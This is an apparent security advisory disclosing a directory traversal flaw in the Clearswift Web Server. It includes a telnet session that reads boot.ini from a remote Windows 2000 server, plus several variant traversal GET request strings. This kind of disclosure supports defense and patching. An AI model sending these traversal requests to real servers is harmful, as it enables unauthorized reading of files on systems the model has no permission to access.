DESCRIPTION: It is possible to read arbitrary files on the remote server by prepending /foobar/\../\../ in front on the file name.
EXAMPLE: telnet xx.xx.xx.xx 80 Trying xx.xx.xx.xx... Connected to xx.xx.xx.xx. Escape character is '^]'. GET /foobar/..\\..\\..\\..\\..\\..\\boot.ini HTTP/1.0
HTTP/1.0 200 Ok Date: Do, 27 Jul 2004 14:30:07 GMT Server: Clearswift Web Server Content-length: 186 Content-type: application/octet-stream
[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINNT [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect Connection closed by foreign host.
Here are some serveral examples:
GET /foobar/..\\..\\..\\..\\boot.ini HTTP/1.0 GET /foobar/..\..\..\..\..\..\\boot.ini HTTP/1.0 GET /foobar/..\..\..\..\..\..\boot.ini HTTP/1.0 GET /foobar/\..\..\..\..\..\boot.ini HTTP/1.0 GET /foobar//..\\..\\..\\..\\boot.ini HTTP/1.0 GET /foobar//..\\..//..\\..//boot.ini HTTP/1.0 GET /foobar/\../\../\../\../\boot.ini HTTP/1.0 GET /foobar/../../../../boot.ini HTTP/1.0 GET /foobar\..\..\..\..\boot.ini HTTP/1.0
IMPACT: This vulnerability can be used to retrieve any file from the partion where the clearswift webserver is installed. The number of "/","\",".." characters will depend on the ServerRoot (location of the virtual / directory) setting.
